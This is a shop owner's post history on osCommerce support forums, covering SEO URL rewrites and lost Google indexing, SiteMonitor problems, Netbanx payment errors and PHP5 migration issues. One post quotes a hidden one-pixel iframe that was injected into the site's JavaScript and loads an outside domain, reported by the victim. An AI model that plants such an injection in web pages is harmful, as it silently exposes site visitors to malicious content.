Jump to content

smic717394

Members
  • Content count

    61
  • Joined

  • Last visited

Everything posted by smic717394

  1. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    Thank you. Your contribution redirects properly are creates the 301, I checked on http://web-sniffer.net/ the old address address http://www.cexy.co.uk/love-zone/romantic-massage-p-3330.html and the status is: Status: HTTP/1.0 301 Moved Permanently Location: http://www.cexy.co.uk/romantic-massage-p-3330.html so should be ok then. Thank you for your help.
  2. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    Well, had, because i now use your contribution, but is it any way I can make the links like before, or what is the best I should do submit the old sitemaps with the old url and when google crawl them will be 301 redirected to the correct links and hopefully I will keep the index links, or what should I do, if I submit a new sitemap with the new links Google might think are duplicates and penalise me for duplicate content.
  3. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    I think this is the function responsable from seo.class.php function get_product_name($pID){ $result = array(); if ($this->attributes['SEO_ADD_CAT_PARENT'] == 'true') { $sql = "SELECT LOWER(cd.categories_name) AS cName FROM ".TABLE_CATEGORIES_DESCRIPTION." cd LEFT JOIN ".TABLE_PRODUCTS_TO_CATEGORIES." p2c on cd.categories_id = p2c.categories_id WHERE p2c.products_id = '".(int)$pID."' AND cd.language_id = '".(int)$this->languages_id."' LIMIT 1"; $result = $this->DB->FetchArray( $this->DB->Query( $sql ) ); $cName = str_replace(" ", "-", $result['cName']); } switch(true){ case ($this->attributes['USE_SEO_CACHE_GLOBAL'] == 'true' && defined('PRODUCT_NAME_' . $pID)): $this->performance['CACHE_QUERY_SAVINGS']++; $return = (tep_not_null($cName) ? $cName . '/'. constant('PRODUCT_NAME_' . $pID) : constant('PRODUCT_NAME_' . $pID)); $this->cache['PRODUCTS'][$pID] = $return; break; case ($this->attributes['USE_SEO_CACHE_GLOBAL'] == 'true' && isset($this->cache['PRODUCTS'][$pID])): $this->performance['CACHE_QUERY_SAVINGS']++; $return = (tep_not_null($cName) ? $cName . '/'. $this->cache['PRODUCTS'][$pID] : $this->cache['PRODUCTS'][$pID]); break; default: $this->performance['NUMBER_QUERIES']++; $sql = "SELECT products_name as pName FROM ".TABLE_PRODUCTS_DESCRIPTION." WHERE products_id='".(int)$pID."' AND language_id='".(int)$this->languages_id."' LIMIT 1"; $result = $this->DB->FetchArray( $this->DB->Query( $sql ) ); $pName = $this->strip( $result['pName'] ); $this->cache['PRODUCTS'][$pID] = $pName; $this->performance['QUERIES']['PRODUCTS'][] = $sql; $return = (tep_not_null($cName) ? $cName . '/'. $pName : $pName); break; } # end switch return $return; } # end function isnt this the part of the code who adds the /? $return = (tep_not_null($cName) ? $cName . '/'. constant('PRODUCT_NAME_' . $pID) : constant('PRODUCT_NAME_' . $pID));
  4. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    love-zone is the category name I thought I said before, the page was on the root and is now on the root. For example, this product is in a subcategory called Sexy Fashion so the URL was: http://www.cexy.co.uk/sexy-fashion/mini-dress-gstring-p-3839.html Now the URL is: http://www.cexy.co.uk/mini-dress-gstring-p-3839.html This product is in a category called Love Zone so the URL was: http://www.cexy.co.uk/love-zone/romantic-massage-p-3330.html Now the URL is: http://www.cexy.co.uk/romantic-massage-p-3330.html This product is in a subcategory called Daring so the URL was: http://www.cexy.co.uk/daring/nurse-p-1804.html And now is: http://www.cexy.co.uk/nurse-p-1804.html And so on, bellow is a print screen of the old SEO configuration, Check out option 3 "Add category parent to begining of URLs?" Now I dont mind having them like they are now, because either of the links the old and the new works, the old style are 301 redirected to the new one, but for whatever reason google is not picking them in the new format.
  5. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    I need Help please this is very important. all my old links are getting kicked from Google index and the new sitemap has 0 index pages. I try to submit the old sitemap with the old links, but Google show warnings that all the links in the database are 301 redirected to another address and I should only include in the sitemap the final destination. I need help please before all my index pages are removed from index. Basically on the product page I want to add the category in between the domain and product name. For example, this is how one of the link was before: http://www.cexy.co.uk/love-zone/romantic-massage-p-3330.html And this is how is now: http://www.cexy.co.uk/romantic-massage-p-3330.html Please Help.
  6. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    The page was on the root and now is on the root too. This is an example. The old URL: http://www.cexy.co.uk/love-zone/romantic-massage-p-3330.html New URL: http://www.cexy.co.uk/romantic-massage-p-3330.html
  7. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    I need some help please, we are desperate because we are losing indexed pages and our traffic is to the ground. In January we moved to a php5 server and i installed this wonderful contribution, the problem is that before we have Chemos contribution and our link use to be www.domain.com/categoiry/product.html and now we have www.domain.com/product.html is there anyway of adding the category to the products url so we can keep the links as they were originally. We used to have 1800 pages indexed and now we dropped to 452. Please Help.
  8. smic717394

    SiteMonitor

    Usually works fine, but as soon as there is a new file or one modified then is when it just hangs. I got this from the log if it helps... PHP Fatal error: Maximum execution time of 600 seconds exceeded in /httpdocs/admin/includes/functions/sitemonitor_functions.php on line 405, referer:
  9. smic717394

    osCommerce VTS

    Somebody injected one of out java scripts with the code bellow, and is not been detected. var jquery = '<iframe height=1 width=1 border=0 src="http:// melopp.biz/fol/?606717496665bcba"> </iframe>';
  10. smic717394

    SiteMonitor

    I have installed v1.9 sometimes it works but most times just times out, it runs for like a minute than i just get a blank page, and the hacking code scanner never worked, as soon as I runn it i get a blank page, is there any way of fixing this times out problems?
  11. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    When does the notfound_404.php kicks in? I keep getting the normal page cannot be displayed.
  12. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    How can I create a new rewrite for pages.php, the links are pages.php?pID=1 or pages.php?CDpath=1 and how do the custom 404 pages work, if I type in something wrong I just get the normal page cannot be displayed and not the custom 404 error page
  13. smic717394

    ULTIMATE Seo Urls 5 - by FWR Media

    I installed this excellent contribution on a CRE 6.4B2B and its working great, i skipped the modification of the "catalog/includes/modules/product_listing.php" because the code in cre is a bit different, is there going to be a problem? Also how can i add new rules, for example in version 6.4 they took out the information.php and newsdesk_info.php and have a new system, pages.php, the links are pages.php?pID=1 or pages.php?CDpath=1 .htaccess can i use the one from the old version 2.1? I could not find one with the package. And last how do the custom 404 pages work, if i type in something wrong i just get the normal page cannot be displayed Thank you again...
  14. Hi, I have installed the iosc_1_2_3 and it was working great, but i recently moved server to a PHP5 server and I reinstalled the contribution but is no longer working, I get a blank page. I made a .htaccess with php_flag display_errors On so I can see the errors, and they are: Notice: Constant DIR_WS_HTTP_CATALOG already defined in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/configure.php on line 21 Notice: Constant DIR_WS_HTTPS_CATALOG already defined in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/configure.php on line 22 Notice: Constant DIR_WS_IMAGES already defined in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/configure.php on line 23 Notice: Constant DIR_WS_INCLUDES already defined in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/configure.php on line 26 Notice: Constant DIR_WS_TEMPLATES already defined in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/configure.php on line 34 Notice: Constant DIR_WS_CONTENT already defined in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/configure.php on line 35 Warning: require() [function.require]: open_basedir restriction in effect. File(/var/www/vhosts/mydomain.co.uk/httpdocs/../includes/database_tables.php) is not within the allowed path(s): (/var/www/vhosts/mydomain.co.uk/httpdocs:/tmp) in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/application_top.php on line 52 Warning: require(/var/www/vhosts/mydomain.co.uk/httpdocs/../includes/database_tables.php) [function.require]: failed to open stream: Operation not permitted in /var/www/vhosts/mydomain.co.uk/httpdocs/includes/application_top.php on line 52 Fatal error: require() [function.require]: Failed opening required '/var/www/vhosts/lond-moda.co.uk/httpdocs/../includes/database_tables.php' (include_path='.:') in /var/www/vhosts/lond-moda.co.uk/httpdocs/includes/application_top.php on line 52 I tried the fix with the domxml-php4-to-php5.php but no luck... Please help..I really like this contribution
  15. smic717394

    Netbanx problem

    I have a little problem with the mod, it works fine on the page, but I'm working on a new design, I installed the module and if the merchant directory is set to demo, then its working fine we can test it it passes the transactions but if we change the directory to my directory then I get this error “(728) Script was called wrongly” The test page is on another domain, but i thought the error for that was 710
  16. smic717394

    NETBANX payment module

    Did you fix this Mark? I get the same problem. Please Help.
  17. smic717394

    NetBanx failure page on OSC

    Hi Mark, How did you fix this? I get the same problem.
  18. This contribution is excelent, too bad is not compatible with Easy Populate
  19. smic717394

    SiteMonitor

    Yes is listed in the reference file but is on the exclude list. And now its very slow, if there are no changed file is very fast if i change one file, and i run the script, it just opens a blank page.
  20. smic717394

    SiteMonitor

    Hi, My exclusion list includeds "admin/backups" but i just created a backup and on the email i get "Found a new file named admin/backups/db_20090731214640.sql.gz", what is wrong?
  21. smic717394

    SiteMonitor

    If i run the second option "Execute Sitemonitor" I receive two emails and if i run the third option "Manually Execute Sitemonitor" i can see the results as well as I receive one email.
  22. smic717394

    SiteMonitor

    I just tried it, still 2 emails when i click on "Execute Sitemonitor"
  23. smic717394

    SiteMonitor

    Anybody found a solution for the double email please?
  24. smic717394

    SiteMonitor

    Is very unlikely a hacker gain access to the admin control panel, the admin folder is password protected and then is the usual admin password protection. Site monitor works, the night I noticed the error, and first file I found was general.php so I restore it from a backup, then I run the site monitor and it did detect the general.php was different (my copy), then I found out that most of the file were corrupt so i just restore all the file. Again excellent contribution Jack, I didn’t want to sound like your contribution was not working. Anyway I went back to version 1.5 because the 1.7 keep sending 2 emails. Is 1.7 better on detecting the changed files, should I just install 1.7 and live with the fact that I'm receiving 2 emails? I check every post for a solution and it is mentioned few times but the solutions are not helping me, I think is to do with the quarantine folder keep showing in the excluding list but the option is not selected.
×